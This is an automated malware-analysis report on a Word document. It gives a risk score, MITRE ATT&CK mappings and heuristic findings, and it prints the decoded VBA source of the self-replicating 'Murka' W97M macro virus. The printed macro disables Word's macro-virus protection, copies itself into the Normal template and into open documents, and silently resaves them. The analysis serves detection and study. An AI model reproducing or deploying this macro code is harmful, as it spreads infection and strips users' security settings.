MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a Word document containing VBA macros. The critical heuristic firing indicates self-replication and AV tampering, suggesting the macro attempts to persist itself. The VBA code explicitly manipulates the Normal template's code module, likely to ensure execution on subsequent document openings or system restarts.
Heuristics 2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.DeleteLines i, j
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3079 bytes |
SHA-256: 0bb8390b83d5f3617220a0eb35409100ec840b3f6fd7974a2ca2169fcdd95010 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'*************************************************************************
'Murka - Ýòî ñàìûé ìàëåíüêèé èç âñåõ èçâåñòíûõ ÌàêðîÀíòèâèðóñíûõ ìîäóëåé!
'Ïðèíöèï äåéñòâèÿ: Çàãðóæàåòñÿ âìåñòå ñ äîêóìåíòîì è áëîêèðóåò
' ðàñïðîñòðàíåíèå çàðàæåííûõ ìîäóëåé
'
'Óñëîâèÿ ðàñïðîñòðàíåíèÿ: Freeware(Ñâîáîäíî)
'Äîñòîèíñòâà: Êîððåêòíàÿ ðàáîòà, íàäåæíîñòü!
'Íåäîñòàòêè: Ïîêà íå íàøåë
'
'"Âñå ýòî, êîíå÷íî, õîðîøî, íî ÿ íè õðåíà íå ïîíÿë, êàê åãî
' ìîæíî ïðåîáðåñòè?!" - ãíåâíî ñêàæåøü òû. Ìîæíî!
'Äåä MustDie âàì âñå ðàñêàæåò!
'Íåîáõîäèìî ëèøü îòêðûòü äîêóìåíò íà ïåðñîíàëüíîì
'êîìïå. ãäå óæå óñòàíîâëåí àíòèâèðóñíûé ìîäóëü Murka.
'
'Àâòîðó: mustdie@chat.ru
'Murke: murka@chat.ru
'Äàíèëîâó: antivir@dials.ru
'*************************************************************************
On Error Resume Next
Dim s As Boolean
Dim i As Long
Dim j As Long
Dim Murka As String
Dim Other As String
Dim str As String
s = ActiveDocument.Saved
Application.EnableCancelKey = wdCancelDisabled
With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
str = "Document_Close"
With MacroContainer.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Murka = .Lines(i, j)
End With
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Other = .Lines(i, j)
If Other <> Murka And Murka <> "" Then
.DeleteLines i, j
.InsertLines 1, Murka
NormalTemplate.Save
End If
End With
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Other = .Lines(i, j)
If Other <> Murka And Murka <> "" Then
.DeleteLines i, j
.InsertLines 1, Murka
Randomize
If Rnd < 0.300000007450581 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Murka3": .Author = "M&M": .Execute: End With
If Left(ActiveDocument.Name, 8) = "Document" Or Left(ActiveDocument.Name, 8) = "Äîêóìåíò" Then
Else
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End If
End With
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.